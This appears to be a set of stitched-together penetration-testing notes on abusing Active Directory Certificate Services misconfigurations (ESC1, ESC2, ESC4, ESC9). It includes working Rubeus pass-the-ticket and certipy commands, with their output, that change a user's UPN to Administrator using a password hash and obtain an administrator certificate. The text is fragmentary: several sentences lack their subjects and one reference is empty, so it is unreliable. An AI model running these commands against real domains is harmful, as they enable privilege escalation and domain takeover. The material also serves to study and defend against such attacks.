Import Base64 Ticketin into the Powershell session using Rubeus
PS C:\Tools> .\Rubeus.exe ptt /ticket:doIGQjCCBj6gAwIBBaEDAgEW<SNIP>
ESC1 - template-allows-san
The primary misconfiguration behind this domain escalation scenario lies in the possibility of specifying an alternate user in the certificate request. This means that if a certificate template allows including a subjectAltName ( SAN ) different from the user making the certificate request (CSR), it would allow us to request a certificate as any user in the domain
ESC2 ( Escalation 2 ) is a variation of ESC1.
When a certificate template specifies the Any Purpose Extended Key Usage (EKU) or does not identify any Extended Key Usage, the certificate can be used for any purpose (client authentication, server authentication, code signing, etc.)
Involves exploiting a different Extended Key Usage (EKU) and necessitates an additional step to carry out the abuse.
The term Extended Key Usage is sometimes used as Enhanced Key Usage by Microsoft documentation, but section 4.2.1.12 of RFC 5280 defines the correct name as Extended Key Usage
If the certificate attribute msPKI-Enrollment-Flag contains the flag CT_FLAG_NO_SECURITY_EXTENSION, the szOID_NTDS_CA_SECURITY_EXT extension will not be embedded, meaning that even with StrongCertificateBindingEnforcement set to 1, the mapping will be performed similarly as a value of 0 in the registry key.
Here are the requirements to perform ESC9:
StrongCertificateBindingEnforcement not set to 2 (default: 1) or CertificateMappingMethods contains UPN flag (0x4)
The template contains the CT_FLAG_NO_SECURITY_EXTENSION flag in the msPKI-Enrollment-Flag value
The template specifies client authentication
GenericWrite right against any account A/1 to compromise any account B/2
Update upn user2
certipy account update -username "[email protected]" -hashes "a091c1832bcdd4677c28b5a6a1295584" -user "user2" -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'user2':
userPrincipalName : Administrator
[*] Successfully updated 'user2'
Get pfx
certipy req -username "user2" -p "12345678" -target "10.10.11.41" -ca 'CA_NAME' -template 'TemplateName'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
is when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN). Request a certificate based on the vulnerable certificate template and specify an arbitrary UPN.
is when a user has write privileges over a certificate template.
This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1. We need to know the DNS name and the Template Name
To understand this privilege escalation, it is recommended to know how certificate mapping is performed. It is presented in .